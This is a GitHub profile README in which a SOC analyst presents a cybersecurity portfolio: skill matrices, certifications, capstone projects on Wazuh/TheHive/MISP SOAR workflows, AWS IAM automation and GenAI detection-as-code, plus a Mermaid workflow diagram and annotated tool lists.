Skip to content
View abdul4rehman215's full-sized avatar
🎯
Focusing
🎯
Focusing

Block or report abdul4rehman215

Block user

Prevent this user from interacting with your repositories and sending you notifications. Learn more about blocking users.

You must be logged in to block users.

Maximum 250 characters. Please don’t include any personal information such as legal names or email addresses. Markdown is supported. This note will only be visible to you.
Report abuse

Contact GitHub support about this user’s behavior. Learn more about reporting abuse.

Report abuse
abdul4rehman215/README.md

Hi, I'm Abdul Rehman

Typing SVG

🛡 SOC Analyst • 🔍 Detection Engineering • ⚙️ Security Automation • ☁️ AWS Security • 🤖 AI-Driven SOC

Telemetry → Detection → Enrichment → Case Management → Automation → Feedback

abdul4rehman215 GitHub Badge


🌐 Connect with Me


👨‍💻 About Me

Name: Abdul Rehman
Role: SOC Analyst | Cybersecurity Analyst | Security Automation Builder
Location: Bengaluru, India 🇮🇳

Primary Focus:
  - SOC Operations & SIEM Monitoring
  - Detection Engineering & Alert Triage
  - Incident Response & Case Workflows
  - AWS Security Monitoring & IAM Automation
  - SOAR Workflows with Wazuh, TheHive, MISP, Cortex, n8n
  - AI-Assisted Security Operations

Current Growth Tracks:
  - Defensive Security Engineering
  - Advanced SOC Operations
  - DevSecOps & Cloud Security
  - AI-Driven Security Operations
  - AI Automation & Agentic Workflows
  - Cybersecurity + AI Practical Lab Roadmap

Approach: Build → Detect → Investigate → Automate → Document → Improve
Philosophy: Automate Everything
Goal: Strengthen security operations through practical automation and AI-assisted workflows
🌐 Open to remote roles & freelance

I’m a hands-on cybersecurity practitioner focused on SOC operations, SIEM monitoring, detection engineering, AWS security, incident response workflows, and open-source security tooling.

My portfolio is built around real lab execution and deep documentation — not just learning tools, but deploying, validating, investigating, automating, documenting, and improving complete technical environments.

Over time, I’ve built and documented work across:

  • SOC & SIEM operations
  • Wazuh-based monitoring, detection, and alert triage
  • TheHive, MISP, Cortex, and n8n-based SOAR workflows
  • AWS security monitoring, IAM automation, and secure cloud infrastructure
  • Linux security hardening, administration, and troubleshooting
  • Incident response simulations, containment workflows, and case documentation
  • Python automation, DevSecOps-style validation, and observability workflows
  • AI-assisted SOC workflows, GenAI security operations, MCP/RAG learning, and agentic automation experiments
  • Data science, machine learning, NLP, and analytics foundations for security-adjacent analysis

I also completed a full-year student internship alongside my cybersecurity studies and continue building a large, structured GitHub portfolio through completed labs, specialist repositories, capstone-style projects, and an active long-term hands-on learning roadmap.


📌 Portfolio Snapshot

🔐 Portfolio Dimension 📈 What It Reflects
28 structured repositories Specialist tracks, capstones, guided labs, learning portfolios, and documentation-first technical projects
700+ completed hands-on labs & projects Practical execution already completed across cybersecurity, Linux, cloud, automation, analytics, AI, and security operations
720-lab advanced roadmap Active next-stage roadmap across blue team, red team, DFIR, cloud security, DevSecOps, AI security, ML, automation, and advanced cyber labs
SOC/SOAR flagship ecosystem 42+ projects, 6 capstones, 11 installations/setups, 6 dashboards, and connected Wazuh + TheHive + MISP + Cortex + n8n workflows
Cloud security engineering AWS IAM security automation, secure infrastructure MVP, CloudTrail, GuardDuty, Config, Security Hub, VPC Flow Logs, and monitoring pipelines
AI-assisted security automation GenAI detection-as-code, MCP/RAG/agentic AI security workflows, Hugging Face agents, LangChain RAG, and n8n-based SOC automation
Python, data & automation depth 57-lab Data Science portfolio and 39-lab Python automation/security engineering portfolio
Documentation-first mindset READMEs, architecture diagrams, workflow mapping, interview Q&A, troubleshooting, evidence packs, and technical reporting

📊 Full Skill Matrix

This matrix reflects my portfolio-wide hands-on implementation across SOC operations, SIEM, Linux security, AWS monitoring, incident response, security automation, AI-assisted security workflows, Python engineering, and analytics.

Depth labels are evidence-based and reflect completed repositories, capstones, labs, workflow prototypes, and documented hands-on projects.

Skill Area Portfolio Evidence Current Depth Tools / Frameworks Used
🛡️ SOC Operations & Alert Triage Alert triage, investigation logic, false-positive review, escalation context, analyst-style documentation High portfolio depth Wazuh, TheHive, MITRE ATT&CK
📊 SIEM Monitoring & Detection Engineering Wazuh monitoring, custom rules, decoders, FIM, telemetry validation, tuning, and detection-focused workflows High portfolio depth Wazuh, ELK, Kibana, Sysmon, auditd
🧾 Incident Response & Case Documentation Alert-to-case thinking, timelines, containment notes, response lifecycle, lessons learned, closure documentation Strong applied exposure TheHive, Cortex, MISP, SOC reporting workflows
🧠 Threat Intelligence & ATT&CK Mapping IOC enrichment, ATT&CK mapping, observable handling, case context, threat-intel feedback loops Strong applied exposure MISP, Cortex, VirusTotal, AlienVault OTX, MITRE ATT&CK
🐧 Linux Security & System Hardening SSH hardening, permissions, services, auditing, logging, firewalling, credential access monitoring High portfolio depth Linux, Ubuntu, Debian, RHEL, auditd, ufw, fail2ban
☁️ AWS Security Monitoring & Cloud Visibility CloudTrail monitoring, IAM activity review, GuardDuty/Security Hub-style workflows, cloud event visibility Strong applied exposure AWS, CloudTrail, IAM, GuardDuty, Security Hub, AWS CLI
☁️ AWS Security Engineering & IAM Automation IAM triage, containment workflows, scheduled IAM hygiene, secure infrastructure MVPs, assessment/remediation automation Growing specialist depth AWS IAM, Security Hub, GuardDuty, CloudTrail, Config, VPC Flow Logs
🧬 GenAI Security & Detection-as-Code AI-app telemetry detection, Wazuh rule CI/CD, MCP/RAG/agentic runtime triage, OWASP LLM mapping Applied / growing depth Wazuh, GitHub PRs, n8n, TheHive, Slack, OWASP LLM, MCP, RAG
⚙️ Python Security Automation & DevSecOps CLI tooling, config validation, testing, backend orchestration, workflow state, logs, metrics, incident-support automation Strong applied exposure Python, Bash, FastAPI, Flask, pytest, PostgreSQL, Redis, Prometheus, Grafana
🤖 AI Automation, Agents, MCP & RAG n8n workflows, prompt/context design, LangChain RAG apps, Hugging Face agents, MCP servers, tool-use workflows Applied / growing depth n8n, LangChain, Hugging Face, FastMCP, smolagents, LlamaIndex, LangGraph
🧪 Vulnerability Assessment & Security Validation Vulnerability review, scan interpretation, hardening validation, posture improvement, remediation thinking Strong applied exposure Nessus, OpenVAS, Checkov, CIS concepts, OWASP ZAP
🌐 Web / Network Security Observation Traffic review, service visibility, WAF monitoring, IDS/NSM visibility, web log observation Solid working depth Wireshark, Nmap, Burp Suite, OWASP ZAP, Nginx, Suricata, Snort, Zeek
🎩 RHEL, Containers & Admin Automation Enterprise-style administration exposure, container workflows, operational consistency, system management Solid working depth RHEL, Podman, Docker, Kubernetes, OpenShift
📈 Data Analytics, ML/NLP & Security-Oriented Analysis Data handling, visualization, statistics, ML/NLP foundations, forecasting, deep learning foundations Solid working depth Jupyter, Pandas, NumPy, Matplotlib, scikit-learn, TensorFlow, PyTorch

🔍 Depth Scale

  • High portfolio depth = repeated implementation across multiple repositories, labs, capstones, and documented workflows
  • Strong applied exposure = clear practical project evidence with hands-on implementation and technical documentation
  • Growing specialist depth = active specialization supported by recent capstone or repository work
  • Applied / growing depth = hands-on projects completed, with continued expansion underway
  • Solid working depth = practical foundation with documented labs and ongoing growth

This matrix reflects overall portfolio capability, not one isolated repository — covering:

SOC → Detection → Investigation → Enrichment → Hardening → Monitoring → Automation → Documentation → Continuous Improvement


🎯 Core Focus Areas

🧭 Domain 🔍 Focus
SOC Operations alert triage, case context, event analysis, escalation thinking, documentation, and analyst workflow discipline
SIEM & Detection Engineering Wazuh monitoring, rules, decoders, FIM, telemetry validation, detection tuning, and alert quality improvement
Incident Response Workflows investigation flow, containment logic, IOC enrichment, MITRE ATT&CK mapping, reporting, and lessons learned
Threat Intelligence & Case Enrichment MISP, Cortex, VirusTotal, OTX, observable context, case comments, and threat-intel feedback loops
Linux Security hardening, SSH security, permissions, auditing, services, endpoint visibility, and system defense
AWS Security & IAM Automation CloudTrail, IAM activity, GuardDuty, Security Hub, Config, identity triage, containment, and hygiene monitoring
Secure Cloud Infrastructure segmented AWS architecture, bastion access, encrypted logging, monitoring controls, validation, and remediation
Security Automation / SOAR n8n, Slack, TheHive, DataTables, workflow state, alert-to-case automation, and closure synchronization
AI Security & GenAI Detection AI-app telemetry, OWASP LLM mapping, MCP/RAG/agentic runtime detection, Wazuh detection-as-code, and SOC triage prototypes
Python Automation & DevSecOps secure CLI tooling, backend orchestration, validation, testing, observability, metrics, and evidence generation
Security Analytics data thinking, statistics, ML/NLP foundations, dashboards, forecasting, and security-oriented analytical reasoning

🚀 Featured Portfolio Highlights

Highlight What It Shows
🛡 End-to-End SOC + SOAR Ecosystem on AWS Connected security operations lab using Wazuh, TheHive, MISP, Cortex, n8n, AWS, dashboards, case workflows, and analyst-style documentation
🔎 Detection Engineering & Cyber Defense Portfolio Endpoint, network, web, cloud, Linux, Windows, Wazuh rules/decoders, validation workflows, and alert-quality improvement
☁️ AWS Security & IAM Automation CloudTrail visibility, IAM triage, GuardDuty/Security Hub-style workflows, secure infrastructure, Config, VPC Flow Logs, and remediation automation
🧬 GenAI Detection-as-Code & AI Security Workflows Wazuh CI/CD, GitHub PR validation, OWASP LLM mapping, MCP/RAG/agentic runtime telemetry, Slack, TheHive, n8n, and audit tables
⚙️ Python Automation, DevSecOps & Observability 39-lab Python automation engineering portfolio covering CLI tools, backend workflows, testing, logs, metrics, compliance evidence, and AI-assisted runbooks
📊 Data Science, ML/NLP & Analytics Foundations 57-lab Data Science portfolio covering Python, pandas, NumPy, visualization, statistics, ML, NLP, forecasting, TensorFlow, and PyTorch
🤗 AI, Hugging Face, LangChain & MCP Learning Hugging Face Agents/LLM/MCP tracks, LangChain RAG app work, MCP automation workflows, AI agents, and source-grounded chatbot development
📝 Documentation-First Portfolio Discipline Strong READMEs, architecture diagrams, troubleshooting notes, interview Q&A, evidence packs, project reports, and technical storytelling

🚀 Future Vision

I am working toward becoming a stronger cybersecurity professional who can improve security operations through defensive engineering, automation, cloud security, and practical AI-assisted workflows.

My long-term direction is to build useful security systems that connect:

  • SOC monitoring and detection engineering
  • incident response and case workflow discipline
  • cloud security, IAM visibility, and DevSecOps-style validation
  • Python automation, observability, and evidence-driven reporting
  • AI-assisted triage, agentic workflows, MCP/RAG learning, and human-in-the-loop automation

The goal is not to automate everything blindly. The goal is to automate the repetitive, high-context, and evidence-heavy work that can help analysts move faster while keeping security decisions explainable and reviewable.


🛠 Technical Skills

🚀 Click to Expand / Collapse Technical Skills

☁️ Cloud & Platform Security

🐳 Containers & Runtime

🔐 Security, SOC & Threat Detection

📊 SIEM, Logging & Case Management

🌐 Networking & Traffic Analysis

🐧 Operating Systems

🧪 Programming, Automation & Analysis

🧩 Backend, DevSecOps & Observability

☕ Java & Integration Development

🤖 AI Automation, Agentic Workflows & Prompting

📈 Data Science, ML & Security Analytics


🛡 What I Work On

Area Practical Work
🔍 SOC Operations & SIEM Monitoring Alert triage, log analysis, Wazuh monitoring, detection review, escalation logic, and analyst-ready notes
🧠 Threat Intelligence & Case Context IOC enrichment, MISP/Cortex workflows, VirusTotal/OTX checks, ATT&CK mapping, and case comments
🐧 Linux Security & Administration Hardening, permissions, SSH security, audit visibility, services, logs, firewalling, and troubleshooting
☁️ AWS Security & IAM Automation CloudTrail visibility, IAM event review, identity triage, hygiene checks, GuardDuty/Security Hub-style workflows
🏰 Secure Cloud Infrastructure Segmented AWS architecture, bastion patterns, least-privilege IAM, encrypted logging, assessment, remediation, and monitoring controls
🧬 GenAI Detection-as-Code Wazuh detection CI/CD, AI-app telemetry, OWASP LLM mapping, MCP/RAG/agentic alert routing, and TheHive case workflows
🤖 AI Automation & n8n Workflows Prompt/context design, Slack notifications, analyst summaries, workflow orchestration, DataTables, and closure sync
⚙️ Python Automation & DevSecOps CLI tools, API services, validation gates, testing, drift checks, logs, metrics, dashboards, and evidence generation
📊 Data Science & ML/NLP Foundations Python analytics, data cleaning, visualization, statistics, ML/NLP basics, forecasting, and model-evaluation practice

🏅 Certifications & Professional Training

☁️ Cloud, Cybersecurity & Governance

  • Cloud Cyber Security CertificateAl-Nafi International College (issued Jan 2026)
  • EduQual RQF Level 3 Diploma in Cloud Cyber SecurityAl-Nafi International College
  • Cyber Security InternshipAl-Nafi International College
  • CISSP-aligned TrainingAl-Nafi International College
  • Certified in Cybersecurity (CC)ISC2
  • ISO/IEC 27001:2022 Lead AuditorMastermind
  • Certified Fundamentals in CybersecurityFortinet

🛡️ SOC, Threat Intelligence, Job Simulations & Security Practice

  • SOC Analyst & Cybersecurity Job SimulationsForage (TATA, Deloitte, AIG, Datacom, Telstra, Commonwealth Bank)
  • Certified Phishing Prevention Specialist (CPPS)Hack & Fix
  • Certified Threat Intelligence & Governance Analyst (CTIGA)Red Team Leaders
  • Certified Red Team Operations Management (CRTOM)Red Team Leaders
  • Cybersecurity Fundamentals, SOC in Practice, Enterprise Security, Threat Intelligence & HuntingIBM SkillsBuild

🤖 AI, MCP, Agents & Automation

  • Hugging Face AI Learning TracksAgents Course, LLM Fundamentals, Fundamentals of MCP, MCP for Production Automation
  • Anthropic AI Fluency & Claude LearningAI Fluency, Claude 101, Claude Code 101, Claude Code in Action, Claude Cowork
  • Anthropic MCP / Agentic Workflow CertificatesIntroduction to MCP, MCP Advanced Topics, Subagents, Agent Skills
  • AI Masterclass & WorkshopsDhruv Rathee Academy, GrowthSchool, be10x
  • AWS DevOps and Agentic AI MasterclassTrain with Shubham

📊 Data, Analytics & Technical Foundations

  • Data Analytics EssentialsCisco Networking Academy
  • Introduction to Data ScienceCisco Networking Academy


💼 Professional Focus

🧭 Current Strengths 🚀 Areas I’m Actively Advancing
SOC Operations, Defensive Security & Automation
  • SOC alert monitoring, triage, investigation logic, and analyst-style documentation
  • SIEM monitoring and detection engineering using Wazuh, rules, decoders, and telemetry validation
  • Threat detection, IOC context, enrichment, and MITRE ATT&CK mapping
  • Incident escalation, case workflow documentation, containment thinking, and closure tracking
  • Linux security, log analysis, hardening, audit visibility, and operational administration
  • AWS monitoring and identity-security workflow exposure through CloudTrail, IAM, GuardDuty, Security Hub, and Config-style projects
  • Open-source SOC ecosystem implementation with Wazuh + TheHive + MISP + Cortex + n8n
  • Python/Bash automation, workflow support, and documentation-first project execution
Security Growth, Engineering Depth & AI Automation Direction
  • Deepening detection logic, alert quality tuning, and stronger SOC decision-making
  • Expanding Wazuh depth through custom rules, decoders, deployment control, regression testing, and dashboard visibility
  • Advancing cloud security engineering around AWS IAM, secure infrastructure, posture monitoring, and remediation workflows
  • Building stronger Python automation, DevSecOps validation, backend workflow services, observability, and evidence generation
  • Growing in GenAI security workflows, detection-as-code, MCP/RAG/agentic AI risk detection, and AI-app telemetry monitoring
  • Learning advanced AI workflow implementation with Hugging Face, LangChain, MCP, agents, and human-in-the-loop automation
  • Working through a new 720-lab advanced roadmap across blue team, red team, DFIR, cloud security, DevSecOps, AI, ML, and automation domains
  • Strengthening documentation quality, project storytelling, architecture explanation, and portfolio presentation
  • Moving toward stronger cybersecurity practice through reliable, explainable, and practical AI-assisted security automation

🚀 Featured Capstone Projects

🛡️ SOC + SOAR Malware Incident Response 🤖 AI-Driven SOC Alert Triage Automation
🔎 Alert → Investigation → Case → Threat Intel
  • Built a complete SOC/SOAR malware investigation workflow on AWS
  • Used Windows endpoint telemetry, Sysmon, Wazuh, TheHive, Cortex, and MISP
  • Practiced triage, validation, enrichment, ATT&CK mapping, case handling, and IOC sharing
  • Documented the full incident lifecycle in an interview-ready portfolio format

GitHub SOC SOAR Capstone

⚙️ Wazuh → n8n → Gemini → Analyst Report
  • Forwarded Wazuh alerts into n8n for AI-assisted triage
  • Normalized alert context and generated analyst-ready summaries using Gemini
  • Focused on reducing manual triage effort and improving decision support
  • Practiced prompt/context design for SOC workflow acceleration

GitHub AI SOC Triage

☁️ AWS IAM Identity Security Automation 🏰 Secure AWS Infrastructure MVP
🔐 Identity Finding → Enrichment → Containment → Closure
  • Designed a four-flow AWS IAM security automation prototype
  • Connected identity triage, IAM enrichment, access-key containment, TheHive alert/case handling, and closure sync
  • Used n8n, AWS GuardDuty/Security Hub/IAM/CloudTrail concepts, Slack, DataTable, and TheHive 5
  • Demonstrated SOC lifecycle thinking for cloud identity incidents and IAM hygiene monitoring

GitHub AWS IAM Capstone

🧱 Build → Govern → Assess → Remediate → Monitor
  • Built a secure-by-design AWS infrastructure MVP using a layered defense model
  • Implemented public/private subnet separation, bastion access, IAM guardrails, encrypted logging, and monitoring controls
  • Used Terraform, Python automation, Checkov, CloudTrail, VPC Flow Logs, AWS Config, GuardDuty, EventBridge, and SNS
  • Focused on secure cloud architecture, validation, remediation, and continuous visibility

GitHub Secure AWS MVP

🧬 GenAI Detection-as-Code CI/CD for Wazuh 🧠 GenAI Detection-as-Code V2 — MCP, RAG & Agentic AI
🚦 Detection Code → CI Gate → Wazuh Deploy → Runtime Triage
  • Built a GenAI security detection-as-code prototype for Wazuh
  • Validated Wazuh XML, Sigma, metadata, mappings, and replay logic through GitHub PR workflows
  • Created controlled deployment gates, runtime GenAI alert triage, Slack notifications, TheHive alerts/cases, and audit tables
  • Mapped prompt-injection and output-handling detections to OWASP LLM and MITRE ATLAS-style context

GitHub GenAI DaC CI/CD

🧩 MCP Tool Risk → RAG/Memory Risk → Agentic Runtime Risk
  • Extended the GenAI detection-as-code model into MCP, RAG/memory, and agentic AI security workflows
  • Built Flow A2/B2/C2 style validation, deployment, and runtime triage logic using GitHub, Wazuh, n8n, Slack, TheHive, and DataTables
  • Added MCP policy monitoring, red-team replay regression, false-positive analytics, and SOC posture metrics
  • Documented prototype boundaries honestly while showing practical AI-security engineering depth

GitHub GenAI DaC V2


🏗️ Capstone Architecture & Workflow

This section highlights the original SOC / SOAR malware investigation architecture, analyst workflow, and threat-intelligence feedback loop using Wazuh, TheHive, Cortex, MISP, AWS, and Sysmon. The featured capstone table above shows how the portfolio has expanded further into AWS IAM automation, secure AWS infrastructure, GenAI detection-as-code, MCP/RAG security, and agentic AI-assisted security operations.

🔍 End-to-End SOC Analyst Workflow

SOC Analyst End-to-End Workflow

🧩 View SOC / SOAR Architecture Pipeline Diagram

SOC SOAR Architecture Workflow

📐 View Mermaid Workflow Diagram
flowchart LR
  %% =========================================================
  %% SOC + SOAR + TI — End-to-End Workflow (Swimlanes, Boxed)
  %% with stronger lane separators (GitHub Mermaid friendly)
  %% =========================================================

  A_ENR[" "]:::anchor
  A_IR[" "]:::anchor
  A_TI[" "]:::anchor
  A_FB1[" "]:::anchor
  A_FB2[" "]:::anchor

  F1[" "]:::frame
  F2[" "]:::frame
  F3[" "]:::frame
  F4[" "]:::frame
  F5[" "]:::frame
  F6[" "]:::frame

  F1 -.-> F2
  F2 -.-> F3
  F3 -.-> F4
  F4 -.-> F5
  F5 -.-> F6

  subgraph L1[" "]
    direction TB
    H1["🪟 Endpoint"]:::laneHeader
    SIM["🧨 Controlled Attack Simulation<br/>PowerShell • DNS • File Drop • Persistence • Network"]:::stage
    ENDPOINT["Sysmon + Wazuh Agent<br/>Telemetry collection"]:::stage
    H1 --> SIM --> ENDPOINT --> F1
  end

  subgraph L2[" "]
    direction TB
    H2["🛡️ SIEM / XDR (Wazuh)"]:::laneHeader
    WAZ["Wazuh Manager<br/>Rules • Correlation • Alerts"]:::stage
    IDX["Wazuh Indexer<br/>OpenSearch"]:::stage
    WDASH["Wazuh Dashboard<br/>Hunting • Evidence • Discover"]:::stage
    H2 --> WAZ --> IDX --> WDASH --> F2
  end

  subgraph L3[" "]
    direction TB
    H3["👨‍💻 SOC Analyst"]:::laneHeader
    ANALYST["Triage + Investigation<br/>Review ➜ Correlate ➜ Extract IOCs"]:::human
    GATE["Decision Gate<br/>True Positive confirmed?"]:::decision
    H3 --> ANALYST --> GATE --> F3
  end

  subgraph L4[" "]
    direction TB
    H4["🗂️ Case Mgmt + SOAR (TheHive + Cortex)"]:::laneHeader
    THEHIVE["TheHive Case<br/>Alert ➜ Case ➜ Tasks ➜ Timeline"]:::stage
    OBS["Observables / IOCs<br/>Hash • Domain • IP • URL • File • Registry"]:::stage
    CORTEX["Cortex Automation<br/>Analyzers / Responders"]:::stage
    ENR["Enrichment Results<br/>VT • OTX • MISP lookups etc."]:::stage
    MITRE["MITRE ATT&CK Mapping<br/>Evidence ➜ Techniques ➜ TTPs"]:::stage

    H4 --> THEHIVE --> OBS --> A_ENR
    A_ENR --> CORTEX --> ENR --> A_ENR
    ENR --> THEHIVE
    THEHIVE --> MITRE --> A_IR --> F4
  end

  subgraph L5[" "]
    direction TB
    H5["🛠️ Incident Response"]:::laneHeader
    IRFLOW["IR Lifecycle<br/>Identify ➜ Analyze ➜ Contain ➜ Eradicate ➜ Recover ➜ Review"]:::ir
    ACTIONS["Endpoint Actions<br/>Triage • Kill proc • Block C2 • Remove persistence • Export EVTX"]:::action
    CLOSE["Case Closure<br/>Final report • Timeline • Metrics • Lessons learned"]:::outcome

    H5 --> IRFLOW --> ACTIONS --> IRFLOW
    IRFLOW --> CLOSE --> A_TI --> F5
  end

  subgraph L6[" "]
    direction TB
    H6["🧠 Threat Intelligence (MISP)"]:::laneHeader
    MISP["MISP Event<br/>Validated IOCs + Tags + Context"]:::ti
    SHARE["Share / Reuse<br/>Correlation • Community • Future detections"]:::ti
    H6 --> MISP --> SHARE --> F6
  end

  ENDPOINT -->|📤 Sysmon telemetry| WAZ
  WDASH --> ANALYST
  GATE -->|📌 Escalate IOCs + evidence| THEHIVE
  A_IR --> IRFLOW
  A_TI -->|✅ Export validated IOCs| MISP

  SHARE -.-> A_FB1 -.->|♻️ Improve detections| WAZ
  SHARE -.-> A_FB2 -.->|🔍 Faster correlation| WDASH

  OUT["🏁 Outcome<br/>End-to-end SOC workflow + SOAR automation + TI feedback loop"]:::outcome
  CLOSE --> OUT

  classDef laneHeader fill:#0b1220,stroke:#94a3b8,stroke-width:3px,stroke-dasharray: 6 4,color:#e5e7eb;
  classDef stage fill:#111827,stroke:#475569,stroke-width:1px,color:#e5e7eb;
  classDef human fill:#0f172a,stroke:#22c55e,stroke-width:1px,color:#e5e7eb;
  classDef decision fill:#0f172a,stroke:#f59e0b,stroke-width:2px,color:#e5e7eb;
  classDef ir fill:#0f172a,stroke:#60a5fa,stroke-width:1px,color:#e5e7eb;
  classDef action fill:#0f172a,stroke:#ef4444,stroke-width:1px,color:#e5e7eb;
  classDef ti fill:#0f172a,stroke:#a78bfa,stroke-width:1px,color:#e5e7eb;
  classDef outcome fill:#0f172a,stroke:#14b8a6,stroke-width:2px,color:#e5e7eb;

  classDef anchor fill:transparent,stroke:transparent,color:transparent;
  classDef frame fill:transparent,stroke:transparent,color:transparent;

  class A_ENR,A_IR,A_TI,A_FB1,A_FB2 anchor;
  class F1,F2,F3,F4,F5,F6 frame;

  linkStyle 0 stroke:#94a3b8,stroke-width:4px,stroke-dasharray:10 6,opacity:0.95;
  linkStyle 1 stroke:#94a3b8,stroke-width:4px,stroke-dasharray:10 6,opacity:0.95;
  linkStyle 2 stroke:#94a3b8,stroke-width:4px,stroke-dasharray:10 6,opacity:0.95;
  linkStyle 3 stroke:#94a3b8,stroke-width:4px,stroke-dasharray:10 6,opacity:0.95;
  linkStyle 4 stroke:#94a3b8,stroke-width:4px,stroke-dasharray:10 6,opacity:0.95;
Loading

🏆 GitHub Trophies

GitHub Profile Trophy


📊 GitHub Analytics

GitHub Stats GitHub Streak Stats

Top Languages

Contribution Graph

📈 More GitHub Metrics

Profile Summary

Repos Per Language Most Commit Language


🔧 Complete Toolset Reference

🛠️ Monitoring, Detection & Logging Arsenal (Click to expand)

🔎 SIEM & Monitoring Platforms

  • Wazuh — SIEM/XDR, endpoint monitoring, FIM, vulnerability detection, custom rules, decoders, and alert routing
  • ELK Stack — Elasticsearch, Logstash, Kibana
  • OpenSearch — dashboarding and search-style visibility exposure
  • Kibana — dashboards, visualization, and security monitoring views
  • Splunk — log analysis and operational visibility
  • CloudTrail — AWS activity visibility and event review
  • VPC Flow Logs — cloud network visibility
  • AWS Config — compliance posture and configuration visibility
  • GuardDuty / Security Hub — AWS security finding and routing concepts

🗂️ Log Collection & Analysis

  • Elasticsearch — log indexing and search
  • Logstash — ingestion and parsing
  • Wazuh Decoders & Rules — event classification and alerting logic
  • Wazuh Custom Integrations — forwarding security alerts into automation workflows
  • auditd — Linux audit logging
  • Sysmon / Sysmon for Linux — endpoint telemetry and event visibility
  • Osquery — endpoint state inspection and threat-hunting visibility
  • Syslog / Linux Logs — operational and security visibility
  • Alert Tuning Concepts — relevance filtering and signal improvement

🧠 Threat Intelligence & SOC Context

  • TheHive 5 — incident, alert, case, task, comment, and lifecycle management
  • MISP — IOC enrichment and sharing concepts
  • Cortex — analyzer-oriented enrichment support
  • VirusTotal / AlienVault OTX — external IOC enrichment
  • MITRE ATT&CK — technique mapping and analyst context
  • MITRE ATLAS-style mapping — AI threat-context language for GenAI security detections
  • OWASP LLM / GenAI Security — LLM risk classification and AI-app security reference
  • OWASP MCP — MCP-specific AI tool-risk reference
🔒 Network Security, Traffic Analysis & Security Testing Tools (Click to expand)

🛡️ Network Security

  • pfSense — firewall and network edge concepts
  • Nginx / Apache — web stack exposure and log visibility
  • ModSecurity + OWASP CRS — WAF detection and web attack monitoring
  • Fail2Ban — automated host-level blocking for repeated attack behavior
  • Wireshark — traffic inspection and packet analysis
  • tcpdump — packet capture and CLI-based visibility
  • Nmap — service enumeration and discovery
  • Suricata / Snort / Zeek — IDS/NSM visibility, alerting, and protocol-aware detection

🔍 Vulnerability & Security Assessment

  • OpenVAS — vulnerability scanning exposure
  • Qualys — cloud security and assessment awareness
  • Nessus — vulnerability review
  • Burp Suite — web security testing workflows
  • OWASP ZAP — web application testing exposure
  • Checkov — infrastructure-as-code security scanning
  • CIS concepts — baseline hardening and control awareness

🔴 Security Testing / Detection Validation

  • Metasploit — offensive simulation in lab contexts
  • Kali Linux — testing and research environment
  • Atomic Red Team concepts — adversary emulation awareness
  • VirusTotal — file/hash/domain/IP enrichment
  • Custom replay/test events — detection validation and regression thinking
💻 Command Line, Systems, Containers & Automation Stack (Click to expand)

☁️ Cloud & Infra Tools

  • AWS CLI — cloud interaction and operational support
  • AWS IAM — identity, access, policy, and credential hygiene workflows
  • AWS EC2 / VPC / S3 / CloudWatch — cloud lab operations and monitoring
  • Terraform — infrastructure-as-code for secure AWS MVP design
  • EventBridge / SNS — cloud event routing and notification concepts
  • Ansible — automation and repeatable administration
  • n8n — workflow orchestration and SOC/SOAR automation

🐳 Container Tools

  • Docker — container workflows
  • Podman — daemonless containers
  • kubectl — Kubernetes CLI exposure
  • OpenShift — enterprise container platform exposure

📜 Scripting & Admin

  • Linux CLI — core administration and troubleshooting
  • bash — automation and shell scripting
  • PowerShell — Windows-side scripting exposure
  • python — scripting, analytics, backend services, and automation
  • vim / nano — CLI editing
  • systemctl / journalctl — service and log management
  • iptables / ufw — firewall and containment actions

🔍 Networking Utilities

  • curl — HTTP / API checks
  • wget — downloads and testing
  • netcat (nc) — networking utility
  • dig — DNS lookup utility
  • traceroute — path tracing
  • ping — connectivity validation
  • ip / ss / netstat — network inspection

🔐 Security Utilities

  • ssh — secure access and admin workflows
  • openssl — SSL/TLS tooling
  • fail2ban — brute-force mitigation
  • ufw — firewall management
  • SELinux / AppArmor — access control and hardening exposure
🧩 Python Automation, DevSecOps & Observability Stack (Click to expand)

⚙️ Python Automation Engineering

  • Python — CLI tooling, scripts, data processing, workflow support, and service logic
  • Bash — repeatable execution, validation scripts, and lab automation
  • FastAPI / Flask — API services, policy/status endpoints, and integration workflows
  • PostgreSQL — workflow state, job registry, and queryable job history
  • Redis — queueing and worker-support patterns
  • pytest / coverage — testing, validation, and quality gates
  • pre-commit — local quality gate and security checks

📦 Delivery, Validation & Governance

  • GitHub / GitHub Actions — PR workflows, validation signals, CI-style automation, and documentation versioning
  • Artifact versioning — repeatable delivery and rollback-aware workflow thinking
  • Configuration validation — schema checks, drift detection, golden config enforcement
  • Policy engineering — automation guardrails, rule enforcement, and compliance evidence

📈 Observability & Evidence

  • Structured Logging — correlation IDs, JSON logs, and operational traceability
  • Prometheus — metrics instrumentation
  • Grafana — dashboard evidence and operational visualization
  • Runbooks / Reports — incident support, CI triage, evidence generation, and documentation
🤖 AI Automation, Workflow Design & Prompting Stack (Click to expand)

🧠 AI Automation & Agentic Workflows

  • n8n — workflow orchestration, node chaining, Slack/TheHive routing, DataTable state, and automation prototypes
  • Gemini API — AI-assisted SOC triage and RAG application workflows
  • AI Agents — task-driven automation experiments and tool-use workflows
  • Hugging Face — agents, LLM fundamentals, MCP learning, Spaces, and model ecosystem practice
  • smolagents / LlamaIndex / LangGraph — agent and RAG-oriented learning exposure
  • FastMCP / MCP servers — MCP workflow servers, tools, resources, and automation integrations
  • GitHub Actions + Slack automation — production-inspired MCP notification and workflow automation practice
  • RAG Basics — retrieval-augmented generation exposure
  • Vector Workflow Basics — vector-based retrieval understanding

✍️ Prompting & Context Engineering

  • Prompt Engineering — structuring effective instructions
  • Context Design — grounding and response quality improvement
  • Workflow Prompt Chaining — passing instructions across nodes and tasks
  • Human-in-the-Loop Design — keeping analyst review, approval, and decision quality in automation workflows
  • LLM-Assisted Automation Thinking — using AI to reduce repetitive operational work responsibly

🧬 AI Security & GenAI Detection

  • Detection-as-Code — detection content validation, deployment gating, and regression thinking
  • OWASP LLM / GenAI risk mapping — prompt injection, output handling, sensitive disclosure, and excessive agency thinking
  • MCP/RAG/Agentic AI security — MCP tool misuse, context injection, memory poisoning, retrieval risk, and agentic action monitoring
  • TheHive + Slack + DataTables — analyst-facing case, notification, and audit evidence handling for AI security alerts
📊 Data Science, Analytics & AI Toolkit (Click to expand)

🧪 Data Analysis & Exploration

  • Jupyter Notebook / Google Colab — interactive coding and lab documentation
  • Pandas — cleaning, filtering, and analysis
  • NumPy — numerical workflows
  • Regex / JSON / CSV workflows — practical extraction and data handling
  • Exploratory Data Analysis — dataset understanding and pattern discovery

📈 Visualization & Storytelling

  • Matplotlib — static charting
  • Seaborn — statistical visualization
